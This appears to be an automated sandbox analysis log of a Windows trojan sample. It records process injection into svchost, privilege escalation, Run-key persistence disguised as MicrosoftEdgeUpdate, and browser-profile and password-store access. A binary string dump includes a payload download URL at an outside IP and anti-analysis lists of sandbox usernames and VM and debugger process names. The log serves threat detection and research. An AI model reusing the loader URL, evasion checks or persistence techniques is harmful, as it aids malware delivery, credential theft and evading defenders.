Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B5AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 9_2_00007FF7A34B5AE0
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F553474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 13_2_00007FF67F553474
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F555AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 13_2_00007FF67F555AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF946404 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00007FF6CF946404
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF945E58 CoInitializeEx,SHGetFolderPathW,CoCreateInstance,CoUninitialize, 0_2_00007FF6CF945E58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Mutant created: NULL
Source: C:\Windows\System32\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\ZBI
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File created: C:\Users\user\AppData\Local\Temp\TH2197.tmp
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe ReversingLabs: Detection: 63%
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: {B268D441C1ED2974164258}.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe String found in binary or memory: invalid string positionstring too longwcscpymsvcrt.dllwcscatwcscmpwcsncpywcslenstrlenreallocfreewcsstrCloseHandlekernel32.dllCreateFileWFreeLibraryMoveFileWGetFileSizeExGetWindowsDirectoryAGetVolumeInformationAGetTickCountwsprintfWuser32.dllwsprintfAVirtualAllocReadFileSleepVirtualFreeSetFilePointerCreateDirectoryWFindFirstFileWFindNextFileWFindCloseCopyFileWWriteFileGetSystemDirectoryWExitProcessCreateProcessWShellExecuteWshell32.dllGetModuleFileNameWGetShortPathNameWGetEnvironmentVariableWInternetOpenWwininet.dllInternetOpenUrlWHttpQueryInfoAInternetReadFileInternetConnectWHttpOpenRequestWHttpSendRequestAInternetCloseHandleSHGetFolderPathWSHGetFolderPathASHGetKnownFolderPathPathIsURLWshlwapi.dllPathCombineWPathFindFileNameWRegDeleteKeyWAdvapi32.dllRegOpenKeyExARegSetValueExARegCloseKeyOpenProcessTokenGetTokenInformationAdjustTokenPrivilegesGetUserNameWLookupPrivilegeValueACoUninitializeole32.dllCoCreateInstanceCoInitializeMessageBoxAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3SeDebugPrivilegevector<T> too longReflectiveLoaderSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolderProcessHacker.exeprocexp.exeprocexp64.exeTOTALCMD.exex64dbg.exehttp://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeMicrosoftEdgeUpdatebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemRoot%\system32\svchost.exegeorgeAbbyDarrel JonesJohnJohn ZalinskyJohn DoeSHCtAGa3rmUV0U6479boGY8wjXNBzWALKERoxYT3lZggZMKt3wObOwwaWuh6PNjaakw.qsMdVVcp06AAy3mLfaNLLPJPQlavKFb0Lt07HV8BUt5BIsCZaFgxGd9fq4Iv8FrankAnnawdagutilityaccountWDAGUtilityAccounthal9thvirusmalwaresandboxsamplecurrentuseremilyhapubwshong leeit-adminjohnsonmillermilozsmicrosoftsand boxmaltestPaul JonesvmrayDiamotrix{%08lX%04lX%lu}ZBI\.exe.lnk\Software\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHiddenServicesUnknown.firefox.exeexplorer.exe\MRT.exe\Mozilla\Firefox\Profiles\*release\drivers\etc\hostsvirustotal
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe "C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe"
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe "C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: libffi-7.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
Source: MicrosoftEdgeUpdate.lnk.0.dr LNK file: ..\..\..\..\..\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312055704.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312690465.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.10.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307390313.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2339757329.00007FF8B83B1000.00000002.00000001.01000000.0000000C.sdmp, ucrtbase.dll.10.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309132497.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306770912.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310481991.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311357401.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309132497.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312870947.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311585051.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2340109854.00007FF8BFB81000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307880735.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310816524.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310155822.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307880735.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp
